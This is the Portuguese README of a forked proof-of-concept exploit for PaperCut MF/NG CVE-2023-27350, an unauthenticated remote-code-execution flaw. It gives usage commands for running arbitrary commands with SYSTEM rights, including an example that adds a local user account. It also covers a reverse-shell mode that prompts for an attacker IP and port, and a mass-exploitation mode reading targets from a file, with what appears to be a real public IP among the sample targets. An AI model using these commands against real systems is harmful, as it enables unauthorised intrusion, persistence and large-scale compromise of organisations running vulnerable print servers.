
Exploit para Papercut CVE-2023-27350. [+] Shell reverso [+] Verificação em massa
Este é um exploit de Prova de Conceito (POC) para CVE-2023-27350, uma vulnerabilidade encontrada no PaperCut MF/NG que permite a um atacante não autenticado executar código arbitrário com privilégios de SYSTEM.
Antes de usar este exploit, certifique-se de ter instalado as seguintes bibliotecas:
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u, --url: A URL da aplicação PaperCut MF/NG alvo (ex., http://target-ip:9191).-c, --command: O comando a ser executado no sistema alvo.--reverse-shell: Use um payload de reverse shell para executar comandos no sistema alvo.-f, --file: Verificar vários alvos a partir de um arquivo (ex., file.txt).Para executar um comando no sistema alvo, use a opção -c:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
Para usar um payload de reverse shell para executar comandos no sistema alvo, use a opção --reverse-shell. Você será solicitado a inserir seu endereço IP e número de porta:
python exploit.py -u http://target-ip:9191 --reverse-shell
Enter your IP address: <attacker-ip>
Enter your port number: <port>
Para verificar vários alvos a partir de um arquivo, use a opção -f. O formato do arquivo deve ser ip_address:porta:
python CVE-2023-27350.py -f file.txt
file.txtAo usar a opção de verificação em massa com a entrada file.txt, certifique-se de que o conteúdo do arquivo está formatado corretamente.
Cada linha do arquivo deve conter o endereço IP e o número da porta de um alvo, separados por dois pontos :. Por exemplo:
110.175.19.78:9191
110.175.19.78:80
192.168.1.1:8080
Certifique-se de que não há espaços extras ou caracteres entre o endereço IP, os dois pontos e o número da porta. Além disso, certifique-se de que cada linha contenha apenas um endereço IP e número de porta.
Esta é uma versão fork do repositório horizon3ai/CVE-2023-27350. Todos os créditos pelo exploit original vão para os autores.